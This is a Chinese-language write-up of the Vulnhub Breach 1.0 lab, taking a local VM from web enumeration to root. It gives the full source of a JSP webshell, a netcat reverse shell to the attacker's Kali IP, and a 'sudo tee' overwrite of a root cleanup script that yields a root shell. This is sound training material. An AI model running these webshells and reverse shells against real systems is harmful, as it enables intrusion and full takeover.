相比于CTF题目,Vulnhub的靶场更贴近于实际一些,而且更加综合考察了知识。在这里记录以下打这个靶场的过程和心得。
测试环境
-
Kali linux IP:192.168.110.128
-
Breach 1.0 IP:192.168.110.140
均通过NAT模式连主机
信息搜集
先扫描开放端口,发现开了一大堆。
直接查看80端口Web
服务
查看页面源码有一串字符
<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
得到一串意义不明的东西pgibbons:damnitfeel$goodtobeagang$ta
点击图片有跳转,挨个点击,发现了一个impress cms
那看到cms
第一反应就是去找现成的漏洞,有跨站脚本执行和本地文件包含,但都是在admin
的情况下才可以执行, 这个时候我们不妨试试之前解出的那串字符,作为账号密码。
发现可以成功,进入之后查看发现有个收件箱,里面三封邮件得到了一个关键信息,192.168.110.140/.keystore
,是一个SSL证书,访问链接即可下载。
但是线索到这里暂时断了,但是网上找到一个漏洞信息
漏洞信息
ImpressCMS
是一款内容管理系统。ImpressCMS
存在跨站脚本漏洞,可通过PATH_INFO
传递给otifications.php
,modules/system/admin/images/browser.php
和modules/content/admin/content.php
脚本的输入注入WEB脚本或HTML,可获得敏感信息或劫持用户会话。
虽然经一系列尝试无果,但是在访问modules/content/admin/content.php
的时候,由于没有权限跳转到了这个页面
content
下面有个链接
是一个流量包,那之前拿到的SSL证书就能用到了。
关键信息:http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'.
查看流量包
打开流量包,直接查看没有什么有用信息
导入SSL证书,因为是tomcat
服务所以端口号选择8443,
说明我们拿到的证书格式不对,需要PKCS12格式的证书。我们使用keytool
查看信息,密码是tomcat
根据提示信息操作
keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
现在格式正确了
重新导入,多了一些http包
我们筛选一下http包
发现在请求一个网页,但是第一次没有成功,比较两个数据包,发现多了这一行请求。
我们也尝试访问这个页面
但是一直访问不成功,尝试抓包
才发现是觉得不安全被拦截了,抓包访问的时候会让你输入账号密码
tomcat:Tt\5D8F(#!*u=G)4m7zB
使用流量包中发现的账号密码登录
进入后台
我们进入了一个tomcat
的后台界面,发现一个文件上传点,需要上传war包。
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
打包成war上传之后访问,传参
成功,但是测试的时候发现隔一会上传的马会被删除,应该是后台有一个定时清除的脚本,因此我们弹一个shell
出来
GetShell以及提权
Kali
使用nc -lnvp 8888
监听
发送nc -v 192.168.110.128 8888 -e /bin/bash
, 成功之后使用python -c 'import pty;pty.spawn("/bin/sh")'
进入交互式界面
home
目录下两个用户以及/etc/passwd
发现在/var/www/5446/
目录下有两个奇怪的php
文件
发现是数据库的账号和密码,我们连接数据库看一看
找到了milton
用户的密码hash
值
破解得密码thelaststraw
。
登录milton
用户,但是发现很遗憾,这个用户没有sudo
权限
查看.bash_history
看样子我们需要得到blumbergh
用户的权限。我们再看milton
家目录下的那张图片,放到/var/www/html/images/
目录下
检查这张图片,并没有什么玄机。
再查看images
下的图片权限
发现有两张图片的权限与其他不同,查看
发现bill.png
下面有个comment
是coffeestains
,结果这个就是blumbergh
用户的密码,就挺离谱的。
登录blumbergh
用户,查看.bash_history
查看一下tidyup.sh
就是这个指令之前删除了我们的shell
但是这个脚本的权限是755
, 现有权限并不能更改
但是我们发现现在这个用户有一个权限,就是可以使用tee
指令
因此就有了修改的方式
echo nc -v 192.168.110.128 8888 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
因为这个脚本是root
用户的权限,因此我们通过这个方式反弹出来的shell
就是root
权限。设置监听之后等待即可。
至此,成功提权到root
。